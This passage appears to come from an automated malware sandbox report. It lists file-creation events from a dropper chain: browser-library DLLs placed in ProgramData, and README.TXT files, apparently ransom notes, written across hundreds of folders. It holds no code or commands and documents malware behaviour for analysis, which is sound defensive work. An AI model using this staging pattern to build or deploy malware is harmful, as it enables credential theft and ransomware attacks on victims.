                          Source: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Y:\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Z:\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Z:\Recovery\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Z:\Recovery\WindowsRE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\$WinREAgent\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Recovery\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\$WinREAgent\Scratch\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\hiimkmnozwszqjugwobwhqxnrnmtkuxvarhzazhqixnggczzvljgcjvbzdoweyuvtcbxgklmswqdd\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\jdownloader\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\mozilla maintenance service\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\msecache\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Microsoft Office 15\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Uninstall Information\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: Y:\EFI\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Aut2Exe\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Icons\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Include\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\SciTE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Office16\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\PackageManifests\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\jdownloader\config\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\LogoImages\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\setup\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\mozilla maintenance service\logs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\AccountPictures\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Desktop\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Documents\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Downloads\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Libraries\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Music\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Pictures\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Public\Videos\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Desktop\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Documents\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Downloads\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Favorites\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Links\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Music\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\OneDrive\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Pictures\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Saved Games\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\Videos\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\Lang\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Geshi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Prettify\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\COM\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\Helpfile\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\SciTE\api\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\.ms-ad\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\3D Objects\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Contacts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Downloads\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Favorites\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Links\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Music\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\OneDrive\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Pictures\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Recent\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Saved Games\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Searches\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Videos\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Aut2Exe\Icons\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Client\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Licenses\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Licenses16\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\loc\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office15\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\rsodWoW6432\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Stationery\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vreg\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vregwow6432\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\ConfigFolders\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\amd64\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ar\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\arm64\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\as-IN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\Assets\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\az-Latn-AZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\bg\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\bn-IN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\bs-Latn-BA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\Bundle\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ca\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ca-Es-VALENCIA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\cs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\cy-GB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\da\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\de\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\el\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\en\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\en-GB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\en-US\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\es\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\et\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\eu\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\fa\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\fi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\fil-PH\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\fr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ga-IE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\gd\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\gl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\gu\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\he\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\hi\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\hr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\hu\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\id\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ig-NG\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\imageformats\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\IRMProtectors\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\is\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\it\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ja\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ka\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\kk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\km-KH\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\kn\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ko\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\kok\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ku-Arab\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\lb-LU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\LogoImages\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\lt\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\lv\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\mi-NZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\mk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ml-in\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\mn\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\mr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ms\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\mt-MT\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\nb-NO\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\ne-NP\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\nl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\nn-NO\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\nso-ZA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\or-IN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\pa\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\pa-Arab-PK\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\pl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\platforms\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\pt-BR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\pt-PT\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\qml\README.TXT
